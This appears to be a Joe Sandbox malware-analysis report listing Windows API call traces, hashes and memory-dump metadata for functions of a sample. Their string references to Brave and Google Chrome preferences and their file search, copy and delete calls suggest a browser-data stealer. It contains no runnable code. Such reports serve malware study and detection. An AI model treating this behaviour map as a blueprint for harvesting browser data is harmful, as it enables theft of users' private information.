                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1966
                                  • lstrlen.KERNEL32(\*.*), ref: 002B1971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 002B199A
                                    • Part of subcall function 002D4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 002D406D
                                    • Part of subcall function 002D4040: lstrcpy.KERNEL32(00000000,?), ref: 002D40A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B19C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1A16
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1A41
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1A81
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1AAC
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002B1B45
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002B1B70
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002B1B8A
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1C03
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1C31
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1C74
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1CA2
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1CAE
                                  • lstrlen.KERNEL32(?), ref: 002B1CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B1CE9
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1D14
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1DEB
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1E19
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1E56
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1E81
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1E8D
                                  • lstrlen.KERNEL32(?), ref: 002B1E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B1EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002B1F45
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1F9F
                                  • lstrlen.KERNEL32(011C9248), ref: 002B1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B1FE3
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B200E
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B204D
                                  • lstrlen.KERNEL32(002E1794), ref: 002B2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2075
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B2081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: 6ce12aaa590bc3b7df69fe083ffda2fff033bbb0c56fab1b0f34e460239dfdef
                                  • Instruction ID: d138ae65bd35b6d9eb91e7e089fd7da2dad81fa1ad2370b50f5d9b9f87c21ea9
                                  • Opcode Fuzzy Hash: 6ce12aaa590bc3b7df69fe083ffda2fff033bbb0c56fab1b0f34e460239dfdef
                                  • Instruction Fuzzy Hash: FB92AF31921747DBDB21EF64DD88AEEB7B9AF44380F544024F849A7252DB30DD29CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDBEF
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002BDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDC17
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002BDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDC4C
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDC8F
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002BDCD0
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002BDCF0
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002BDD0A
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002BDD1D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDD7B
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDDA3
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDDAF
                                  • lstrlen.KERNEL32(?), ref: 002BDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 002BDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDE19
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BDE6F
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDE7B
                                  • lstrlen.KERNEL32(011C90F8), ref: 002BDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDEBB
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BDEE6
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDEF2
                                  • lstrlen.KERNEL32(011C9228), ref: 002BDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDFA5
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDFB1
                                  • lstrlen.KERNEL32(011C90F8), ref: 002BDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDFF4
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE022
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BE02E
                                  • lstrlen.KERNEL32(011C9228), ref: 002BE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 002BE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 002BE0E7
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE11F
                                  • lstrlen.KERNEL32(011CD688), ref: 002BE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 002BE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE19F
                                  • lstrcat.KERNEL32(00000000), ref: 002BE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 002BE1F9
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE22F
                                  • lstrlen.KERNEL32(011C9248), ref: 002BE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE261
                                  • lstrcat.KERNEL32(00000000,011C9248), ref: 002BE269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 002BE274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 002BE2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE349
                                  • DeleteFileA.KERNEL32(?), ref: 002BE381
                                  • StrCmpCA.SHLWAPI(?,011CD508), ref: 002BE3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE445
                                  • StrCmpCA.SHLWAPI(?,011C9228), ref: 002BE468
                                  • StrCmpCA.SHLWAPI(?,011C90F8), ref: 002BE47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002BE4E0
                                  • StrCmpCA.SHLWAPI(?,011CD628), ref: 002BE58E
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 002BE639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 002BE776
                                  • DeleteFileA.KERNEL32(?), ref: 002BE7D2
                                  • StrCmpCA.SHLWAPI(?,011C9198), ref: 002BE7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: 0a79d405651ac389ccba9d275df127ed4edb0c495238cd8e2d8eea34c91053a7
                                  • Instruction ID: 917033db0e2efa3c902cf58b197372876aadf6790b0e40342a3acae308b3db7a
                                  • Opcode Fuzzy Hash: 0a79d405651ac389ccba9d275df127ed4edb0c495238cd8e2d8eea34c91053a7
                                  • Instruction Fuzzy Hash: C892AE719202469BDF20EF74DC89AEE77B9AF44380F554428F84AA7251DB34EC69CF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C18D2
                                  • lstrlen.KERNEL32(\*.*), ref: 002C18DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C18FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 002C190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C1947
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002C1967
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002C1981
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C19BF
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C19F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1A4C
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1A80
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1AB4
                                  • lstrlen.KERNEL32(?), ref: 002C1AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C1AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1B19
                                  • lstrlen.KERNEL32(011C9238), ref: 002C1B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1B8F
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1BC3
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1C57
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1C8B
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1D21
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1D55
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1DED
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1E36
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1E68
                                  • lstrlen.KERNEL32(011CD640), ref: 002C1E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1EB2
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1EE3
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1F15
                                  • lstrlen.KERNEL32(011CD730), ref: 002C1F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1F5F
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1F90
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1FC2
                                  • lstrlen.KERNEL32(011BB6D0), ref: 002C1FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2036
                                  • lstrlen.KERNEL32(002E1794), ref: 002C2048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2067
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C2073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2098
                                  • lstrlen.KERNEL32(?), ref: 002C20AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C20D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C20DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2103
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C213F
                                  • lstrlen.KERNEL32(011CD688), ref: 002C214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C2181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: 54a3330b3f5225888a0a77cd07e99b6c0a6538b6636d8c2def04cc913c5fe642
                                  • Instruction ID: 7c2c83460b516c97fe00673c6900821a3c0a776d7f35a69dfde543563aee61b6
                                  • Opcode Fuzzy Hash: 54a3330b3f5225888a0a77cd07e99b6c0a6538b6636d8c2def04cc913c5fe642
                                  • Instruction Fuzzy Hash: D362AF30921657DBDB21EF64CD89FBEB7B9AF41740F144228B849A7252DB30DD29CB90
                                  APIs
                                  • wsprintfA.USER32 ref: 002C392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002C3943
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002C396C
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002C3986
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C39BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C39E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C39F2
                                  • lstrlen.KERNEL32(002E1794), ref: 002C39FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3A1A
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3A26
                                  • lstrlen.KERNEL32(?), ref: 002C3A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C3A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3A8A
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C3ACE
                                  • lstrlen.KERNEL32(?), ref: 002C3AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3B36
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3B6A
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3B9E
                                  • lstrlen.KERNEL32(?), ref: 002C3BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C3BE0
                                  • lstrlen.KERNEL32(011C9248), ref: 002C3C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3C3C
                                  • lstrlen.KERNEL32(011C9238), ref: 002C3C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3CB7
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3CE8
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C3D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3D79
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3DAD
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3E43
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3E77
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3F0D
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3F41
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3F75
                                  • lstrlen.KERNEL32(?), ref: 002C3F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C3FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3FE0
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C401F
                                  • lstrlen.KERNEL32(011CD688), ref: 002C402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C40CE
                                  • lstrcat.KERNEL32(00000000), ref: 002C40DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002C42D9
                                  • FindClose.KERNEL32(00000000), ref: 002C42E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
